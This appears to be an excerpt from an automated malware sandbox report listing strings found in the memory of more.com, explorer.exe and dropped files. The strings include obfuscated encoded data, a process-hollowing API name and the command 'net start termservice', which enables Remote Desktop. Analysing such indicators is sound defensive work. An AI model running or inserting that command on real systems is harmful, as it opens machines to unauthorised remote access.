Source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setb91ec37b19247dd92a901a8f950c08d9f5a43204a66445ad0e09c0db80eb910b776334a83469992ad7a23ca2f09ee0eb5da9daZVz4fehA1U0n9B4f5XPk1W2E9QGn2f8hc0Q=Mx8mcUllK0If7nQjC2jjPGS9Jhqq2x==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gLsZ0ZxMYZqOvgA1k9f7JAu3zH9B2izXAK6AkEmdy==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gPsZ0ZxMY380elm30IeIlbn3mPa5C2B9Bp=OQUAOo==VwQpdzQuKQRwfI==MQLwfI==0UG6PLViPkQdVD==S184fPRuBkMXVT==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwIZ8h0O==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgXPJm3gsM7JYq3Czv22upXRyBV1HlefN23y==VkLxZ0RoKu5EyDAGNHoQzC7oB3BlVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwdlLy1yttCxz VFzz1VFi2VD=VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgWUdm2En NpbqQGTn3w==KTLXTNFRKi0zOXADAQ==YCvAes==VCZXXs==SYLYbUG elC d0G c1C Zka ZVy dEC eUU 0EQ ZVO cFO c03 dhQ=Z1zp1u1l2Eo1U5An4C3 2GucZ1zp1u1l2En=Z0nteu1l2En=0Bu=0Ru=0Ry=0RC=UUvtd9==bFH4evkwBu==bFH4ezI7BwZ=0V8p0EnwZ0RodFCBcVDtfkbAM1v5cOR1QEC+QEG+MZrwfO q2lDoLwivJu==gy==KlLycPM QO==d08pdysACgWd8Jz=b0LCdeRtCxznVJAqS0L4VeB11VQeQ6ox5GTiIW2r q==VFzz1VFi2SIa JIaRTPFWTMhK00f Kgf4mS=RVPteeA=T0vDeyRz30kYEHAfPg==STDJXs==VEvy1yAhK0Mc 0Mn5Hi=SEZnfy5zyD5eUj==RTPLNxOAXy51OUoMVZQZ4mjP5Q==Rkb41yRnPUWdV0L=UkZCfy5vV0ZAcy5AR0ZxdUNwW0byTyRnPUWdV0L=NBuCOrM2Dh4XKT==dky=e0y=R0ZyfyRv4ASNa0EjFizi4Wu59Rqj2kTt0kZCdKXlOVIaKBEg33TjPGCDcNPvAP3rMQQxNKWuEOfHdU11PUWTHXUn43zk32i59QYwDfEkc1zxNONi4Ev0EJ8f3WSYymOmbAtkDvEkbUnpdeBuPRRbJeQOSU5v4EMn F4S6XzaEiymaBqu0TQfeEbzda5wO1Ie F4x5HHaOWXSAaPMEOexNKWuBQR=MQQRE9==Q1DnebWyMkfA1o==R0ZyfyRv4ASNa0EjFiz73Hyx9QCj3DotcgZ8NP 44wSf86MrCXTn2GSzWWYmOTT=VZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6M5br4HTPPXGTWQQnMBQtcVr5fyRzJkwmVT==R0ZxezR1PVAHUZ4jZUzn1yRnP09i7pwq3W3k3HCDaXG33kg2fVeAOLEADBLVJCj3CV6=MVLycOJwPELmVZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6RZ8n5GT LmipXQYeFXbMWDzTVxtXISIyP4z=VZbXXwRONCEo8qUw32vIPXNBKxueJZYwekbn1PJdGkws7ZQC2XLl2GC VzOrODYtWkbo1O5KHy==YBqAOvw=SELq0PRt4DEe KUn3mboBleXXRCx1EYYbUZySELq0PRt4DEe KUn3mboBliXXRCx1EYYbUZyVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1CkVdNdG1Mr9pYs5FXa3nKu WT=VFzz1zRk4CWa8ZX=NhqBQI==NhqCO9==NhqBP9==NhqCPI==R1LCeeRv4CAU7ZAiYy==Phe dlLy1yttCxznV0kjM0ikJlHleUps1UolEFbkzC7e2SxnJgqqLax11USe86YYzDC6ziVlXAKuxx==KgOkTPdq4Az=JgqqLaxzPUV JAOqKs==VEZ71PFA1EMl8F8j6GS=MUL81OJ24Eco8qEt3Gj95SyDXQQx3DYxbU4y1OMhBSQi8JXezg==Je==d085fyNw40V H0PeCXO6CA==d1Gceo==dkvy1y5uT0L90e5i3kH PJI333TPNFyDXQmxNTT=NBqAOvw1CRb=NBqAOvw1Chz=NBqAOvw1ChD=NBqAOvw1C0P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000
Source: more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setb91ec37b19247dd92a901a8f950c08d9f5a43204a66445ad0e09c0db80eb910b776334a83469992ad7a23ca2f09ee0eb5da9daZVz4fehA1U0n9B4f5XPk1W2E9QGn2f8hc0Q=Mx8mcUllK0If7nQjC2jjPGS9Jhqq2x==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gLsZ0ZxMYZqOvgA1k9f7JAu3zH9B2izXAK6AkEmdy==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gPsZ0ZxMY380elm30IeIlbn3mPa5C2B9Bp=OQUAOo==VwQpdzQuKQRwfI==MQLwfI==0UG6PLViPkQdVD==S184fPRuBkMXVT==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwIZ8h0O==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgXPJm3gsM7JYq3Czv22upXRyBV1HlefN23y==VkLxZ0RoKu5EyDAGNHoQzC7oB3BlVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwdlLy1yttCxz VFzz1VFi2VD=VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgWUdm2En NpbqQGTn3w==KTLXTNFRKi0zOXADAQ==YCvAes==VCZXXs==SYLYbUG elC d0G c1C Zka ZVy dEC eUU 0EQ ZVO cFO c03 dhQ=Z1zp1u1l2Eo1U5An4C3 2GucZ1zp1u1l2En=Z0nteu1l2En=0Bu=0Ru=0Ry=0RC=UUvtd9==bFH4evkwBu==bFH4ezI7BwZ=0V8p0EnwZ0RodFCBcVDtfkbAM1v5cOR1QEC+QEG+MZrwfO q2lDoLwivJu==gy==KlLycPM QO==d08pdysACgWd8Jz=b0LCdeRtCxznVJAqS0L4VeB11VQeQ6ox5GTiIW2r q==VFzz1VFi2SIa JIaRTPFWTMhK00f Kgf4mS=RVPteeA=T0vDeyRz30kYEHAfPg==STDJXs==VEvy1yAhK0Mc 0Mn5Hi=SEZnfy5zyD5eUj==RTPLNxOAXy51OUoMVZQZ4mjP5Q==Rkb41yRnPUWdV0L=UkZCfy5vV0ZAcy5AR0ZxdUNwW0byTyRnPUWdV0L=NBuCOrM2Dh4XKT==dky=e0y=R0ZyfyRv4ASNa0EjFizi4Wu59Rqj2kTt0kZCdKXlOVIaKBEg33TjPGCDcNPvAP3rMQQxNKWuEOfHdU11PUWTHXUn43zk32i59QYwDfEkc1zxNONi4Ev0EJ8f3WSYymOmbAtkDvEkbUnpdeBuPRRbJeQOSU5v4EMn F4S6XzaEiymaBqu0TQfeEbzda5wO1Ie F4x5HHaOWXSAaPMEOexNKWuBQR=MQQRE9==Q1DnebWyMkfA1o==R0ZyfyRv4ASNa0EjFiz73Hyx9QCj3DotcgZ8NP 44wSf86MrCXTn2GSzWWYmOTT=VZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6M5br4HTPPXGTWQQnMBQtcVr5fyRzJkwmVT==R0ZxezR1PVAHUZ4jZUzn1yRnP09i7pwq3W3k3HCDaXG33kg2fVeAOLEADBLVJCj3CV6=MVLycOJwPELmVZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6RZ8n5GT LmipXQYeFXbMWDzTVxtXISIyP4z=VZbXXwRONCEo8qUw32vIPXNBKxueJZYwekbn1PJdGkws7ZQC2XLl2GC VzOrODYtWkbo1O5KHy==YBqAOvw=SELq0PRt4DEe KUn3mboBleXXRCx1EYYbUZySELq0PRt4DEe KUn3mboBliXXRCx1EYYbUZyVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1CkVdNdG1Mr9pYs5FXa3nKu WT=VFzz1zRk4CWa8ZX=NhqBQI==NhqCO9==NhqBP9==NhqCPI==R1LCeeRv4CAU7ZAiYy==Phe dlLy1yttCxznV0kjM0ikJlHleUps1UolEFbkzC7e2SxnJgqqLax11USe86YYzDC6ziVlXAKuxx==KgOkTPdq4Az=JgqqLaxzPUV JAOqKs==VEZ71PFA1EMl8F8j6GS=MUL81OJ24Eco8qEt3Gj95SyDXQQx3DYxbU4y1OMhBSQi8JXezg==Je==d085fyNw40V H0PeCXO6CA==d1Gceo==dkvy1y5uT0L90e5i3kH PJI333TPNFyDXQmxNTT=NBqAOvw1CRb=NBqAOvw1Chz=NBqAOvw1ChD=NBqAOvw1C0P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000
Source: explorer.exe String found in binary or memory: net start termservice
Source: explorer.exe, 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp String found in binary or memory: net start termservice
Source: explorer.exe, 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setb91ec37b19247dd92a901a8f950c08d9f5a43204a66445ad0e09c0db80eb910b776334a83469992ad7a23ca2f09ee0eb5da9daZVz4fehA1U0n9B4f5XPk1W2E9QGn2f8hc0Q=Mx8mcUllK0If7nQjC2jjPGS9Jhqq2x==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gLsZ0ZxMYZqOvgA1k9f7JAu3zH9B2izXAK6AkEmdy==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gPsZ0ZxMY380elm30IeIlbn3mPa5C2B9Bp=OQUAOo==VwQpdzQuKQRwfI==MQLwfI==0UG6PLViPkQdVD==S184fPRuBkMXVT==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwIZ8h0O==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgXPJm3gsM7JYq3Czv22upXRyBV1HlefN23y==VkLxZ0RoKu5EyDAGNHoQzC7oB3BlVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwdlLy1yttCxz VFzz1VFi2VD=VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgWUdm2En NpbqQGTn3w==KTLXTNFRKi0zOXADAQ==YCvAes==VCZXXs==SYLYbUG elC d0G c1C Zka ZVy dEC eUU 0EQ ZVO cFO c03 dhQ=Z1zp1u1l2Eo1U5An4C3 2GucZ1zp1u1l2En=Z0nteu1l2En=0Bu=0Ru=0Ry=0RC=UUvtd9==bFH4evkwBu==bFH4ezI7BwZ=0V8p0EnwZ0RodFCBcVDtfkbAM1v5cOR1QEC+QEG+MZrwfO q2lDoLwivJu==gy==KlLycPM QO==d08pdysACgWd8Jz=b0LCdeRtCxznVJAqS0L4VeB11VQeQ6ox5GTiIW2r q==VFzz1VFi2SIa JIaRTPFWTMhK00f Kgf4mS=RVPteeA=T0vDeyRz30kYEHAfPg==STDJXs==VEvy1yAhK0Mc 0Mn5Hi=SEZnfy5zyD5eUj==RTPLNxOAXy51OUoMVZQZ4mjP5Q==Rkb41yRnPUWdV0L=UkZCfy5vV0ZAcy5AR0ZxdUNwW0byTyRnPUWdV0L=NBuCOrM2Dh4XKT==dky=e0y=R0ZyfyRv4ASNa0EjFizi4Wu59Rqj2kTt0kZCdKXlOVIaKBEg33TjPGCDcNPvAP3rMQQxNKWuEOfHdU11PUWTHXUn43zk32i59QYwDfEkc1zxNONi4Ev0EJ8f3WSYymOmbAtkDvEkbUnpdeBuPRRbJeQOSU5v4EMn F4S6XzaEiymaBqu0TQfeEbzda5wO1Ie F4x5HHaOWXSAaPMEOexNKWuBQR=MQQRE9==Q1DnebWyMkfA1o==R0ZyfyRv4ASNa0EjFiz73Hyx9QCj3DotcgZ8NP 44wSf86MrCXTn2GSzWWYmOTT=VZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6M5br4HTPPXGTWQQnMBQtcVr5fyRzJkwmVT==R0ZxezR1PVAHUZ4jZUzn1yRnP09i7pwq3W3k3HCDaXG33kg2fVeAOLEADBLVJCj3CV6=MVLycOJwPELmVZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6RZ8n5GT LmipXQYeFXbMWDzTVxtXISIyP4z=VZbXXwRONCEo8qUw32vIPXNBKxueJZYwekbn1PJdGkws7ZQC2XLl2GC VzOrODYtWkbo1O5KHy==YBqAOvw=SELq0PRt4DEe KUn3mboBleXXRCx1EYYbUZySELq0PRt4DEe KUn3mboBliXXRCx1EYYbUZyVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1CkVdNdG1Mr9pYs5FXa3nKu WT=VFzz1zRk4CWa8ZX=NhqBQI==NhqCO9==NhqBP9==NhqCPI==R1LCeeRv4CAU7ZAiYy==Phe dlLy1yttCxznV0kjM0ikJlHleUps1UolEFbkzC7e2SxnJgqqLax11USe86YYzDC6ziVlXAKuxx==KgOkTPdq4Az=JgqqLaxzPUV JAOqKs==VEZ71PFA1EMl8F8j6GS=MUL81OJ24Eco8qEt3Gj95SyDXQQx3DYxbU4y1OMhBSQi8JXezg==Je==d085fyNw40V H0PeCXO6CA==d1Gceo==dkvy1y5uT0L90e5i3kH PJI333TPNFyDXQmxNTT=NBqAOvw1CRb=NBqAOvw1Chz=NBqAOvw1ChD=NBqAOvw1C0P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000
Source: explorer.exe, 00000010.00000002.2933737758.00000000001D0000.00000002.00000001.01000000.00000000.sdmp String found in binary or memory: net start termservice
Source: cnfpnteryde.1.dr String found in binary or memory: net start termservice
Source: vkqcbyjdfiw.12.dr String found in binary or memory: net start termservice